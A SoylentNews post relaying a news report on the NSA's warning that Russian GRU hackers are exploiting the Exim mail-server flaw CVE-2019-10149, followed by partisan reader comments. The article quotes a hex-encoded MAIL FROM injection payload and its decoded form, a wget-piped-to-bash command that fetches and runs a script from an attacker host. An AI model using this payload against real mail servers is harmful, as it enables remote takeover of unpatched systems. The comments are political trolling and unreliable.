Stories
Slash Boxes
Comments

SoylentNews is people

posted by Fnord666 on Saturday May 30 2020, @03:23PM   Printer-friendly
from the patch-your-servers-now! dept.

It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously:

The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.

The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.

Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:

MAIL FROM:${run{\x2Fbin\x2Fsh\t- c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be That hexadecimal decodes to: /bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"

"The Russian actors, part of the General Staff Main Intelligence Directorate's (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker's dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.

In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.

Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.

The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.

Previously: 400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks


Original Submission

 
This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
  • (Score: 0, Informative) by Anonymous Coward on Saturday May 30 2020, @04:59PM (6 children)

    by Anonymous Coward on Saturday May 30 2020, @04:59PM (#1001067)

    Who to blame? Please! This is the continuing DNC fairy tale, scapegoating their way to victory!

    Starting Score:    0  points
    Moderation   0  
       Troll=1, Informative=1, Total=2
    Extra 'Informative' Modifier   0  

    Total Score:   0  
  • (Score: 1, Insightful) by Anonymous Coward on Saturday May 30 2020, @05:02PM (1 child)

    by Anonymous Coward on Saturday May 30 2020, @05:02PM (#1001068)

    You may joke, but that was my first, second, and third thought. Probably still leaning that way. I'm not kidding -- there's a Boy Who Cried Wolf issue here and Democrats, the legacy media, and their compadres in the Executive branch police and surveillance agencies are 100% at fault.

    • (Score: -1, Offtopic) by Anonymous Coward on Saturday May 30 2020, @05:50PM

      by Anonymous Coward on Saturday May 30 2020, @05:50PM (#1001090)

      Shit, they're rejecting the narrative. I know you're reading this, Bob. I told you so! We should have gone with clowncels instead.

  • (Score: 5, Touché) by ilPapa on Saturday May 30 2020, @05:52PM (3 children)

    by ilPapa (2366) on Saturday May 30 2020, @05:52PM (#1001091) Journal

    Who to blame? Please! This is the continuing DNC fairy tale, scapegoating their way to victory!

    You dumb sonofabitch. Donald Trump is now in charge of the NSA.

    --
    You are still welcome on my lawn.
    • (Score: 0, Insightful) by Anonymous Coward on Saturday May 30 2020, @06:44PM (1 child)

      by Anonymous Coward on Saturday May 30 2020, @06:44PM (#1001106)

      >> You dumb sonofabitch. Donald Trump is now in charge of the NSA.

      You dumb sonofabitch. In Soviet America, the GRU is now in charge of Donald Trump.

      • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @08:35PM

        by Anonymous Coward on Saturday May 30 2020, @08:35PM (#1001150)

        Bastards. First the filthy, dirty, BO stink of the Incelabteilung murders Rosa Luxemburg, then grues eat Leon Trotsky, and now the Incelabteilung is in cahoots with the grues!

        Only Lysol and fluorescent lights can solve this!

    • (Score: 0) by Anonymous Coward on Wednesday June 03 2020, @01:41AM

      by Anonymous Coward on Wednesday June 03 2020, @01:41AM (#1002538)

      Okay, so, that makes them what? good? or evil?